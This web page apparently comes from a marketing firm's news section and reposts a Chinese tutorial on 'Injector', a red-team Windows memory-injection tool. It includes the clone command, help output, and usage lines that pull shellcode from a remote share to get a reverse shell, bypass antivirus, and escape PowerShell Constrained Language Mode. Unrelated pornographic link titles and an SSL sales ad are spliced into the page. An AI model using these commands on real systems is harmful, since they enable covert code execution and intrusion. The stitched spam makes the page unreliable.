日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
如何使用Injector實現(xiàn)Windows下的內(nèi)存注入

關(guān)于Injector

Injector是一款功能齊全且強大的內(nèi)存注入工具,該工具集成了多種技術(shù),可以幫助紅隊研究人員實現(xiàn)在Windows系統(tǒng)下的內(nèi)存注入。

蕪湖縣ssl適用于網(wǎng)站、小程序/APP、API接口等需要進行數(shù)據(jù)傳輸應(yīng)用場景,ssl證書未來市場廣闊!成為創(chuàng)新互聯(lián)公司的ssl證書銷售渠道,可以享受市場價格4-6折優(yōu)惠!如果有意向歡迎電話聯(lián)系或者加微信:18980820575(備注:SSL證書合作)期待與您的合作!

Injector能做什么?

針對遠程服務(wù)器和本地存儲提供Shellcode注入支持。只需指定Shellcode文件,該工具將幫助我們完成后續(xù)的所有事情。默認情況下,工具會將Shellcode注入至exe,如果沒有找到目標進程,它將會創(chuàng)建一個記事本進程,并注入其中實現(xiàn)持久化感染。

  • 支持反射DLL注入,工具將下載DLL并注入遠程進程。
  • 通過exe實現(xiàn)進程鏤空。
  • 使用-bypass參數(shù),以支持使用更高級的、未記錄的API來進行進程注入。
  • 支持加密的Shellcode,比如說AES加密或異或加密等。
  • 支持針對PowerShell的CLM繞過,可以直接將代碼存防止能夠執(zhí)行C#代碼的白名單文件夾中,比如說“C:\Windows\Tasks”。
  • 支持DLL鏤空,通過dll實現(xiàn)。

工具下載

廣大研究人員可以使用下列命令將該項目源碼克隆至本地:

 
 
  1. git clone https://github.com/0xDivyanshu/Injector.git

工具幫助

 
 
  1. C:\Users\admin>Injector.exe
  2. Help Options for Xenon:
  3. -m       Mode of operation
  4.         -m 1     Specifies the mode as Process injection
  5.         -m 2     Specifies the mode as Reflective DLL Injection
  6.         -m 3     Specifies the mode as Process Hollowing
  7.         -m 4     No injection! Give me my damn shell
  8.         -m 5     Powershell session via CLM bypass
  9.         -m 6     DLL hollowing
  10.  
  11. -TempFile        File location that your current user can read
  12. -shellcode       Use shellcode
  13. -dll     Use dll
  14. -decrypt-xor     Specify Xor decryption for shellcode
  15.          -pass   Specifty the password for Xor decryption
  16. -decrypt-aes     Specify aes decryption for shellcode
  17.          -pass   Specifty the password for aes decryption
  18. -location        Specify the location i.e either server or local
  19. -bypass         Uses enhance attempts to bypass AV

如需生成加密的Shellcode,請在Kali下使用Helper.exe。

工具使用樣例

 
 
  1. Injector.exe -m=1 -shellcode -encrypt-aes -pass=password -location="\\192.x.x.x\share\shellcode.txt" -bypass

上述命令將解密你的Shellcode并給你一個反向Shell。

如果你不想使用加密的Shellcode,你也可以直接使用下列命令運行下列命令:

 
 
  1. Injector.exe -m=1 -shellcode -location="\\192.x.x.x\share\shellcode.txt"

將其中的“-m=1”修改為“2,3,4,6”之后,就可以運行其他模式了:

 
 
  1. Injector.exe -m=5 -TempFile=C:\\Users\\user\\sample.txt

上述命令將提供要給會話,我們可以使用它來執(zhí)行IEX cradle,并獲取一個能夠繞過CLM的反向Shell。

PowerShell

你還可以使用Invoke-Exe.ps1來通過PowerShel執(zhí)行Injector:

 
 
  1. Invoke-Exe -loc C:\Users\john\injector.exe

項目地址

Injector:【GitHub傳送門】


網(wǎng)站名稱:如何使用Injector實現(xiàn)Windows下的內(nèi)存注入
文章URL:http://www.dlmjj.cn/article/dhohgso.html